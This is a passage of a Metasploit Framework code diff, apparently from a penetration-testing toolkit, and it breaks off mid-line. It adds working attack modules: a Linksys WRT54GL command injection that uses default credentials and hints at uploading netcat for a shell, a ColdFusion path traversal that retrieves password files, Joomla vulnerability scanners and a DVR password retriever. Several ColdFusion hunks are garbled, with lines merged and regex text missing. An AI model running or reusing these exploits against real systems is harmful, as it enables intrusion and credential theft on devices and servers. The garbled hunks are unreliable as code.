%grn_||__ %yel\ %whi| + %whi| %red| %whiPAYLOAD %red|%whi""\%red___, %whi| %yel/ %grn(_||_ %yel\ %whi| + %whi| %red|________________|__|)__| %whi| %yel| %grn__||_) %yel| %whi| + %whi| %red|(@)(@)"""**|(@)(@)**|(@) %whi| %yel" %grn|| %yel" %whi| + %whi| %yel= = = = = = = = = = = = %whi| %yel'--------------' %whi| + %whi+---------------------------+---------------------------+%clr diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index cb6aca1ca6..6d8fc9ae3a 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb @@ -342,7 +342,15 @@ class Console::CommandDispatcher::Core return end - print_status("Migrating to #{pid}...") + begin + server = client.sys.process.open + rescue TimeoutError => e + elog(e.to_s) + rescue RequestError => e + elog(e.to_s) + end + + server ? print_status("Migrating from #{server.pid} to #{pid}...") : print_status("Migrating to #{pid}") # Do this thang. client.core.migrate(pid) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb index 37386cad66..6c4bd90f17 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb @@ -129,7 +129,7 @@ class Console::CommandDispatcher::Stdapi::Ui def cmd_screenshot( *args ) path = Rex::Text.rand_text_alpha(8) + ".jpeg" quality = 50 - view = true + view = false screenshot_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help Banner." ], diff --git a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb new file mode 100644 index 0000000000..ea37ca8e21 --- /dev/null +++ b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb @@ -0,0 +1,202 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Linksys WRT54GL Remote Command Execution', + 'Description' => %q{ + Some Linksys Routers are vulnerable to OS Command injection. + You will need credentials to the web interface to access the vulnerable part + of the application. + Default credentials are always a good starting point. admin/admin or admin + and blank password could be a first try. + Note: This is a blind os command injection vulnerability. This means that + you will not see any output of your command. Try a ping command to your + local system for a first test. + + Hint: To get a remote shell you could upload a netcat binary and exec it. + WARNING: Backup your network and dhcp configuration. We will overwrite it! + Have phun + }, + 'Author' => [ 'm-1-k-3' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'http://homesupport.cisco.com/en-eu/support/routers/WRT54GL' ], + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-01' ], + [ 'URL', 'http://www.s3cur1ty.de/attacking-linksys-wrt54gl' ], + [ 'EDB', '24202' ], + [ 'BID', '57459' ], + [ 'OSVDB', '89421' ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 18 2013')) + + register_options( + [ + Opt::RPORT(80), + OptString.new('TARGETURI',[ true, 'PATH to OS Command Injection', '/apply.cgi']), + OptString.new('USERNAME',[ true, 'User to login with', 'admin']), + OptString.new('PASSWORD',[ false, 'Password to login with', 'password']), + OptString.new('CMD', [ true, 'The command to execute', 'ping 127.0.0.1']), + OptString.new('NETMASK', [ false, 'LAN Netmask of the router', '255.255.255.0']), + OptAddress.new('LANIP', [ false, 'LAN IP address of the router - CHANGE THIS', '1.1.1.1']), + OptString.new('ROUTER_NAME', [ false, 'Name of the router', 'cisco']), + OptString.new('WAN_DOMAIN', [ false, 'WAN Domain Name', 'test']), + OptString.new('WAN_MTU', [ false, 'WAN MTU', '1500']) + ], self.class) + end + + def run + #setting up some basic variables + uri = datastore['TARGETURI'] + user = datastore['USERNAME'] + rhost = datastore['RHOST'] + netmask = datastore['NETMASK'] + routername = datastore['ROUTER_NAME'] + wandomain = datastore['WAN_DOMAIN'] + wanmtu = datastore['WAN_MTU'] + + if datastore['LANIP'] !~ /1.1.1.1/ + #there is a configuration from the user so we use LANIP for the router configuration + ip = datastore['LANIP'].split('.') + else + #no configuration from user so we use RHOST for the router configuration + ip = rhost.split('.') + end + + if datastore['PASSWORD'].nil? + pass = "" + else + pass = datastore['PASSWORD'] + end + + print_status("Trying to login with #{user} / #{pass}") + + begin + res = send_request_cgi({ + 'uri' => uri, + 'method' => 'GET', + 'basic_auth' => "#{user}:#{pass}" + }) + + unless (res.kind_of? Rex::Proto::Http::Response) + vprint_error("#{rhost} not responding") + return :abort + end + + if (res.code == 404) + print_error("Not Found page returned") + return :abort + end + + if [200, 301, 302].include?(res.code) + print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'") + else + print_error("NO SUCCESSFUL LOGIN POSSIBLE. '#{user}' : '#{pass}'") + return :abort + end + + rescue ::Rex::ConnectionError + vprint_error("#{rhost} - Failed to connect to the web server") + return :abort + end + + cmd = datastore['CMD'] + + print_status("Sending remote command: " + cmd) + + #cmd = Rex::Text.uri_encode(datastore['CMD']) + #original Post Request: + #data_cmd = "submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&" + #data_cmd << "lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=#{routername}&" + #data_cmd << "wan_hostname=`#{cmd}`&wan_domain=#{wandomain}&mtu_enable=1&wan_mtu=#{wanmtu}&lan_ipaddr_0=#{ip[0]}&" + #data_cmd << "lan_ipaddr_1=#{ip[1]}&lan_ipaddr_2=#{ip[2]}&lan_ipaddr_3=#{ip[3]}&lan_netmask=#{netmask}&" + #data_cmd << "lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&" + #data_cmd << "wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&" + #data_cmd << "wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&" + #data_cmd << "wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1" + + vprint_status("using the following target URL: #{uri}") + + begin + res = send_request_cgi({ + 'uri' => uri, + 'method' => 'POST', + 'basic_auth' => "#{pass}:#{pass}", + #'data' => data_cmd, + + 'vars_post' => { + 'submit_button' => "index", + 'change_action' => "1", + 'submit_type' => "1", + 'action' => "Apply", + 'now_proto' => "dhcp", + 'daylight_time' => "1", + 'lan_ipaddr' => "4", + 'wait_time' => "0", + 'need_reboot' => "0", + 'ui_language' => "de", + 'wan_proto' => "dhcp", + 'router_name' => "#{routername}", + 'wan_hostname' => "`#{cmd}`", + 'wan_domain' => "#{wandomain}", + 'mtu_enable' => "1", + 'wan_mtu' => "#{wanmtu}", + 'lan_ipaddr_0' => "#{ip[0]}", + 'lan_ipaddr_1' => "#{ip[1]}", + 'lan_ipaddr_2' => "#{ip[2]}", + 'lan_ipaddr_3' => "#{ip[3]}", + 'lan_netmask' => "#{netmask}", + 'lan_proto' => "dhcp", + 'dhcp_check' => "1", + 'dhcp_start' => "100", + 'dhcp_num' => "50", + 'dhcp_lease' => "0", + 'wan_dns' => "4", + 'wan_dns0_0' => "0", + 'wan_dns0_1' => "0", + 'wan_dns0_2' => "0", + 'wan_dns0_3' => "0", + 'wan_dns1_0' => "0", + 'wan_dns1_1' => "0", + 'wan_dns1_2' => "0", + 'wan_dns1_3' => "0", + 'wan_dns2_0' => "0", + 'wan_dns2_1' => "0", + 'wan_dns2_2' => "0", + 'wan_dns2_3' => "0", + 'wan_wins' => "4", + 'wan_wins_0' => "0", + 'wan_wins_1' => "0", + 'wan_wins_2' => "0", + 'wan_wins_3' => "0", + 'time_zone' => "-08+1+1", + '_daylight_time' => '1' + } + }) + rescue ::Rex::ConnectionError + vprint_error("#{rhost} - Failed to connect to the web server") + return :abort + end + + if res and res.code == 200 + print_status("Blind Exploitation - Response expected") + else + print_error("Blind Exploitation - Response don't expected") + end + print_status("Blind Exploitation - wait around 10 seconds until the configuration gets applied and your command gets executed") + print_status("Blind Exploitation - unknown Exploitation state") + end +end + diff --git a/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb similarity index 91% rename from modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb rename to modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb index 476ccc65f2..abe5c91903 100644 --- a/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb +++ b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb @@ -11,6 +11,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner def proto 'ftp' @@ -28,7 +29,11 @@ class Metasploit3 < Msf::Auxiliary Although the daemon runs with SYSTEM privileges, access is limited to files that reside on the same drive as the FTP server's root directory. }, - 'Author' => 'jduck', + 'Author' => + [ + 'jduck', + 'Brandon McCann @zeknox ', + ], 'License' => MSF_LICENSE, 'References' => [ @@ -47,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary end - def run + def run_host(ip) connect_login @@ -55,7 +60,8 @@ class Metasploit3 < Msf::Auxiliary res = send_cmd( ['XCRC', path, "0", "9999999999"], true ) if not (res =~ /501 Syntax error in parameters or arguments\. EndPos of 9999999999 is larger than file size (.*)\./) - raise RuntimeError, "Unable to obtain file size! File probably doesn't exist." + print_error("Unable to obtain file size! File probably doesn't exist.") + return end file_size = $1.to_i @@ -94,6 +100,7 @@ class Metasploit3 < Msf::Auxiliary fname = datastore['PATH'].gsub(/[\/\\]/, '_') p = store_loot("titanftp.traversal", "text/plain", "rhost", file_data, fname) + print_status("Saved in: #{p}") vprint_status(file_data.inspect) disconnect diff --git a/modules/auxiliary/scanner/http/cold_fusion_version.rb b/modules/auxiliary/scanner/http/cold_fusion_version.rb index 92aaba751e..64bb92f12a 100644 --- a/modules/auxiliary/scanner/http/cold_fusion_version.rb +++ b/modules/auxiliary/scanner/http/cold_fusion_version.rb @@ -36,11 +36,10 @@ class Metasploit3 < Msf::Auxiliary end end - len = (response.body.length > 2500) ? 2500 : response.body.length return nil if response.body.length < 100 title = "Not Found" - if(response.body =~ /(.+)<\/title\/?>/i) + if(response.body =~ /(.+)<\/title\/?>/im) title = $1 title.gsub!(/\s/, '') end @@ -51,9 +50,11 @@ class Metasploit3 < Msf::Auxiliary if(response.body =~ />\s*Version:\s*(.*)<\/strong\>\s+ url, 'method' => 'GET', - }, 5) + }) return if not res or not res.body or not res.code res.body.gsub!(/[\r|\n]/, ' ') diff --git a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb index f02623f760..caa4201756 100644 --- a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb +++ b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb @@ -29,8 +29,12 @@ class Metasploit3 < Msf::Auxiliary to have directory traversal protections in place, subsequently this module does NOT work against ColdFusion 9. Adobe did not release patches for ColdFusion 6.1 or ColdFusion 7. + + It is not recommended to set FILE when doing scans across a group of servers where the OS + may vary; otherwise, the file requested may not make sense for the OS + }, - 'Author' => [ 'CG' ], + 'Author' => [ 'CG', 'nebulus' ], 'License' => MSF_LICENSE, 'References' => [ @@ -45,40 +49,149 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptString.new('URL', [ true, "URI Path", '/CFIDE/administrator/enter.cfm']), - OptString.new('PATH', [ true, "traversal and file", '../../../../../../../../../../ColdFusion8/lib/password.properties%00en']), + OptString.new('FILE', [ false, 'File to retrieve', '']), + OptBool.new('FINGERPRINT', [true, 'Only fingerprint endpoints', false]) ], self.class) end + def fingerprint(response) + + if(response.headers.has_key?('Server') ) + if(response.headers['Server'] =~ /IIS/ or response.headers['Server'] =~ /\(Windows/) + os = "Windows (#{response.headers['Server']})" + elsif(response.headers['Server'] =~ /Apache\//) + os = "Unix (#{response.headers['Server']})" + else + os = response.headers['Server'] + end + end + + return nil if response.body.length < 100 + + title = "Not Found" + response.body.gsub!(/[\r\n]/, '') + if(response.body =~ /(.+)<\/title\/?>/i) + title = $1 + title.gsub!(/\s/, '') + end + return nil if( title == 'Not Found' or not title =~ /ColdFusionAdministrator/) + + out = nil + + if(response.body =~ />\s*Version:\s*(.*)<\/strong\>\s+ url+locale+trav, - 'method' => 'GET', - 'headers' => - { + url = '/CFIDE/administrator/index.cfm' + + res = send_request_cgi({ + 'uri' => url, + 'method' => 'GET', 'Connection' => "keep-alive", 'Accept-Encoding' => "zip,deflate", - }, - }, -1) + }) - if (res.nil?) - print_error("no response for #{ip}:#{rport} #{url}") - elsif (res.code == 200) - #print_error("#{res.body}")#debug - print_status("URL: #{ip}#{url}") - if match = res.body.match(/\(.*)\<\/title\>/im); - fileout = $1 - print_status("FILE OUTPUT:\n" + fileout + "\r\n") + return if not res or not res.body or not res.code + + if (res.code.to_i == 200) + out = fingerprint(res) + print_status("#{ip} #{out}") if out + return if (datastore['FINGERPRINT']) + + if(out =~ /Windows/ and out =~ /MX6/) + trav = '..\..\..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en' + elsif(out =~ /Windows/ and out =~ /MX7/) + trav = '..\..\..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en' + elsif(out =~ /Windows/ and out =~ /ColdFusion 8/) + trav = '..\..\..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en' + elsif(out =~ /ColdFusion 9/) + print_status("#{ip} ColdFusion 9 is not vulnerable, skipping") + return + elsif(out =~ /Unix/ and out =~ /MX6/) + trav = '../../../../../../../../../../opt/coldfusionmx/lib/password.properties%00en' + elsif(out =~ /Unix/ and out =~ /MX7/) + trav = '../../../../../../../../../../opt/coldfusionmx7/lib/password.properties%00en' + elsif(out =~ /Unix/ and out =~ /ColdFusion 8/) + trav = '../../../../../../../../../../opt/coldfusion8/lib/password.properties%00en' + else + if(res.body =~ /Adobe/ and res.body =~ /ColdFusion/) + print_error("#{ip} Fingerprint failed, FILE not set...aborting") + else + return # probably just a web server + end + end else - '' + return # silent fail as it doesnt necessarily at this point have to be a CF server + end + end + + # file specified or obtained via fingerprint + if(trav !~ /\.\.\/\.\.\// and trav !~ /\.\.\\\.\.\\/) + # file probably specified by user, make sure to add in actual traversal + trav = '../../../../../../../../../../' << trav << '%00en' + end + + locale = "?locale=" + + urls = ["/CFIDE/administrator/enter.cfm", "/CFIDE/wizards/common/_logintowizard.cfm", "/CFIDE/administrator/archives/index.cfm", + "/CFIDE/administrator/entman/index.cfm", "/CFIDE/administrator/logging/settings.cfm"] + # "/CFIDE/install.cfm", haven't seen where this one works + + out = '' # to keep output in synch with threads + urls.each do |url| + res = send_request_raw({ + 'uri' => url+locale+trav, + 'method' => 'GET', + 'headers' => + { + 'Connection' => "keep-alive", + 'Accept-Encoding' => "zip,deflate", + }, + }) + + + if (res.nil?) + print_error("no response for #{ip}:#{rport} #{url}") + elsif (res.code == 200) + #print_error("#{res.body}")#debug + print_status("URL: #{ip}#{url}#{locale}#{trav}") + if res.body.match(/\(.*)\<\/title\>/im) + fileout = $1 + if(fileout !~ /Login$/ and fileout !~ /^Welcome to ColdFusion/ and fileout !~ /^Archives and Deployment/) + print_good("#{ip} FILE: #{fileout}") + break + end + end + else + next if (res.code == 500 or res.code == 404 or res.code == 302) + print_error("#{ip} #{res.inspect}") end - else - '' end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError diff --git a/modules/auxiliary/scanner/http/joomla_pages.rb b/modules/auxiliary/scanner/http/joomla_pages.rb new file mode 100755 index 0000000000..77218063a5 --- /dev/null +++ b/modules/auxiliary/scanner/http/joomla_pages.rb @@ -0,0 +1,109 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + # Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to + # Joomscan and various MSF modules for code examples. + def initialize + super( + 'Name' => 'Joomla Version Scanner', + 'Description' => %q{ + This module scans a Joomla install for common pages. + }, + 'Author' => [ 'newpid0' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']) + ], self.class) + end + + def peer + return "#{rhost}:#{rport}" + end + + def run_host(ip) + tpath = normalize_uri(target_uri.path) + if tpath[-1,1] != '/' + tpath += '/' + end + + pages = [ + 'robots.txt', + 'administrator/index.php', + 'admin/', + 'index.php/using-joomla/extensions/components/users-component/registration-form', + 'index.php/component/users/?view=registration', + 'htaccess.txt' + ] + + vprint_status("#{peer} - Checking for interesting pages") + pages.each do |page| + scan_pages(tpath, page, ip) + end + + end + + def scan_pages(tpath, page, ip) + res = send_request_cgi({ + 'uri' => "#{tpath}#{page}", + 'method' => 'GET', + }) + return if not res or not res.body or not res.code + res.body.gsub!(/[\r|\n]/, ' ') + + if (res.code == 200) + note = "Page Found" + if (res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/) + note = "Administrator Login Page" + elsif (res.body =~/Registration/ and res.body =~/class="validate">Register<\/button>/) + note = "Registration Page" + end + + print_good("#{peer} - #{note}: #{tpath}#{page}") + + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'joomla_page', + :data => "#{note}: #{tpath}#{page}", + :update => :unique_data + ) + elsif (res.code == 403) + if (res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + vprint_status("#{ip} denied access to #{ip} (SSL Required)") + elsif (res.body =~ /has a list of IP addresses that are not allowed/) + vprint_status("#{ip} restricted access by IP") + elsif (res.body =~ /SSL client certificate is required/) + vprint_status("#{ip} requires a SSL client certificate") + else + vprint_status("#{ip} ip access to #{ip} #{res.code} #{res.message}") + end + end + + return + + rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return + rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return + end + +end diff --git a/modules/auxiliary/scanner/http/joomla_plugins.rb b/modules/auxiliary/scanner/http/joomla_plugins.rb new file mode 100755 index 0000000000..37dff56fd4 --- /dev/null +++ b/modules/auxiliary/scanner/http/joomla_plugins.rb @@ -0,0 +1,175 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + # Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to + # Joomscan and various MSF modules for code examples. + def initialize + super( + 'Name' => 'Joomla Plugins Scanner', + 'Description' => %q{ + This module scans a Joomla install for plugins and potential + vulnerabilities. + }, + 'Author' => [ 'newpid0' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']), + OptPath.new('PLUGINS', [ true, "Path to list of plugins to enumerate", File.join(Msf::Config.install_root, "data", "wordlists", "joomla.txt")]) + ], self.class) + end + + def peer + return "#{rhost}:#{rport}" + end + + def run_host(ip) + tpath = normalize_uri(target_uri.path) + if tpath[-1,1] != '/' + tpath += '/' + end + + vprint_status("#{peer} - Checking for interesting plugins") + res = send_request_cgi({ + 'uri' => tpath, + 'method' => 'GET' + }) + return if res.nil? + + res.body.gsub!(/[\r|\n]/, ' ') + File.open(datastore['PLUGINS'], 'rb').each_line do |line| + papp = line.chomp + plugin_search(tpath, papp, ip, res.body.size) + end + end + + def plugin_search(tpath, papp, ip, osize) + res = send_request_cgi({ + 'uri' => "#{tpath}#{papp}", + 'method' => 'GET' + }) + return if res.nil? + + res.body.gsub!(/[\r|\n]/, ' ') + nsize = res.body.size + + if (res.code == 200 and res.body !~/#404 Component not found/ and res.body !~/

Joomla! Administration Login<\/h1>/ and osize != nsize) + print_good("#{peer} - Plugin: #{tpath}#{papp} ") + report_note( + :host => ip, + :port => rport, + :proto => 'http', + :ntype => 'joomla_plugin', + :data => "#{tpath}#{papp}", + :update => :unique_data + ) + + if (papp =~/passwd/ and res.body =~/root/) + print_good("#{peer} - Vulnerability: Potential LFI") + report_web_vuln( + :host => ip, + :port => rport, + :vhost => vhost, + :ssl => ssl, + :path => tpath, + :method => "GET", + :pname => "", + :proof => "Response with code #{res.code} contains the 'root' signature", + :risk => 1, + :confidence => 10, + :category => 'Local File Inclusion', + :description => "Joomla: Potential LFI at #{tpath}#{papp}", + :name => 'Local File Inclusion' + ) + elsif (res.body =~/SQL syntax/) + print_good("#{peer} - Vulnerability: Potential SQL Injection") + report_web_vuln( + :host => ip, + :port => rport, + :vhost => vhost, + :ssl => ssl, + :path => tpath, + :method => "GET", + :pname => "", + :proof => "Response with code #{res.code} contains the 'SQL syntax' signature", + :risk => 1, + :confidence => 10, + :category => 'SQL Injection', + :description => "Joomla: Potential SQLI at #{tpath}#{papp}", + :name => 'SQL Injection' + ) + elsif (papp =~/>alert/ and res.body =~/>alert/) + print_good("#{peer} - Vulnerability: Potential XSS") + report_web_vuln( + :host => ip, + :port => rport, + :vhost => vhost, + :ssl => ssl, + :path => tpath, + :method => "GET", + :pname => "", + :proof => "Response with code #{res.code} contains the '>alert' signature", + :risk => 1, + :confidence => 10, + :category => 'Cross Site Scripting', + :description => "Joomla: Potential XSS at #{tpath}#{papp}", + :name => 'Cross Site Scripting' + ) + elsif (papp =~/com_/) + vars = papp.split('_') + pages = vars[1].gsub('/','') + res1 = send_request_cgi({ + 'uri' => "#{tpath}index.php?option=com_#{pages}", + 'method' => 'GET' + }) + if (res1.code == 200) + print_good("#{peer} - Page: #{tpath}index.php?option=com_#{pages}") + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'joomla_page', + :data => "Page: #{tpath}index.php?option=com_#{pages}", + :update => :unique_data + ) + else + vprint_error("#{peer} - Page: #{tpath}index.php?option=com_#{pages} gave a #{res1.code} response") + end + end + elsif (res.code == 403) + if (res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + vprint_status("#{ip} ip access to #{ip} (SSL Required)") + elsif (res.body =~ /has a list of IP addresses that are not allowed/) + vprint_status("#{ip} restricted access by IP") + elsif (res.body =~ /SSL client certificate is required/) + vprint_status("#{ip} requires a SSL client certificate") + else + vprint_status("#{ip} denied access to #{ip}#{tpath}#{papp} - #{res.code} #{res.message}") + end + end + return + + rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return + rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return + end + +end diff --git a/modules/auxiliary/scanner/http/joomla_version.rb b/modules/auxiliary/scanner/http/joomla_version.rb new file mode 100755 index 0000000000..f0ebb7cbda --- /dev/null +++ b/modules/auxiliary/scanner/http/joomla_version.rb @@ -0,0 +1,174 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + # Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to + # Joomscan and various MSF modules for code examples. + def initialize + super( + 'Name' => 'Joomla Version Scanner', + 'Description' => %q{ + This module scans a Joomla install for information about the underlying + operating system and Joomla version. + }, + 'Author' => [ 'newpid0' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']) + ], self.class) + end + + def peer + return "#{rhost}:#{rport}" + end + + def os_fingerprint(response) + if not response.headers.has_key?('Server') + return "Unkown OS (No Server Header)" + end + + case response.headers['Server'] + when /Win32/, /\(Windows/, /IIS/ + os = "Windows" + when /Apache\// + os = "*Nix" + else + os = "Unknown Server Header Reporting: "+response.headers['Server'] + end + return os + end + + def fingerprint(response) + case response.body + when /(.+)<\/version\/?>/i + v = $1 + out = (v =~ /^6/) ? "Joomla #{v}" : " #{v}" + when /system\.css 20196 2011\-01\-09 02\:40\:25Z ian/, + /MooTools\.More\=\{version\:\"1\.3\.0\.1\"/, + /en-GB\.ini 20196 2011\-01\-09 02\:40\:25Z ian/, + /en-GB\.ini 20990 2011\-03\-18 16\:42\:30Z infograf768/, + /20196 2011\-01\-09 02\:40\:25Z ian/ + out = "1.6" + when /system\.css 21322 2011\-05\-11 01\:10\:29Z dextercowley /, + /MooTools\.More\=\{version\:\"1\.3\.2\.1\"/, + /22183 2011\-09\-30 09\:04\:32Z infograf768/, + /21660 2011\-06\-23 13\:25\:32Z infograf768/ + out = "1.7" + when /Joomla! 1.5/, + /MooTools\=\{version\:\'1\.12\'\}/, + /11391 2009\-01\-04 13\:35\:50Z ian/ + out = "1.5" + when /Copyright \(C\) 2005 \- 2012 Open Source Matters/, + /MooTools.More\=\{version\:\"1\.4\.0\.1\"/ + out = "2.5" + when /\s+ "#{tpath}#{file}", + 'method' => 'GET' + }) + + return :abort if res.nil? + + res.body.gsub!(/[\r|\n]/, ' ') + + if (res.code == 200) + os = os_fingerprint(res) + out = fingerprint(res) + return false if not out + + if(out =~ /Unknown Joomla/) + print_error("#{peer} - Unable to identify Joomla Version with #{file}") + return false + else + print_good("#{peer} - Joomla Version:#{out} from: #{file} ") + print_good("#{peer} - OS: #{os}") + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'joomla_version', + :data => out + ) + return true + end + elsif (res.code == 403) + if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + vprint_status("#{ip} denied access to #{ip} (SSL Required)") + elsif(res.body =~ /has a list of IP addresses that are not allowed/) + vprint_status("#{ip} restricted access by IP") + elsif(res.body =~ /SSL client certificate is required/) + vprint_status("#{ip} requires a SSL client certificate") + else + vprint_status("#{ip} denied access to #{ip} #{res.code} #{res.message}") + end + return :abort + end + + return false + + rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return :abort + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return :abort + rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return :abort + end + + def run_host(ip) + tpath = normalize_uri(target_uri.path) + if tpath[-1,1] != '/' + tpath += '/' + end + + files = [ + 'language/en-GB/en-GB.xml', + 'templates/system/css/system.css', + 'media/system/js/mootools-more.js', + 'language/en-GB/en-GB.ini', + 'htaccess.txt', + 'language/en-GB/en-GB.com_media.ini' + ] + + vprint_status("#{peer} - Checking Joomla version") + files.each do |file| + joomla_found = check_file(tpath, file, ip) + return if joomla_found == :abort + break if joomla_found + end + end + +end diff --git a/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb b/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb new file mode 100644 index 0000000000..af08f4d8c0 --- /dev/null +++ b/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb @@ -0,0 +1,112 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'Ray Sharp DVR Password Retriever', + 'Description' => %q{ + This module takes advantage of a protocol design issue with the + Ray Sharp based DVR systems. It is possible to retrieve the username and + password through the TCP service running on port 9000. Other brands using + this platform and exposing the same issue may include Swann, Lorex, + Night Owl, Zmodo, URMET, and KGuard Security. + }, + 'Author' => + [ + 'someluser', # Python script + 'hdm' # Metasploit module + ], + 'References' => + [ + [ 'URL', 'http://console-cowboys.blogspot.com/2013/01/swann-song-dvr-insecurity.html' ] + ], + 'License' => MSF_LICENSE + ) + + register_options( [ Opt::RPORT(9000) ], self.class) + end + + def run_host(ip) + req = + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0E\x0F" + + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00" + + ( "\x00" * 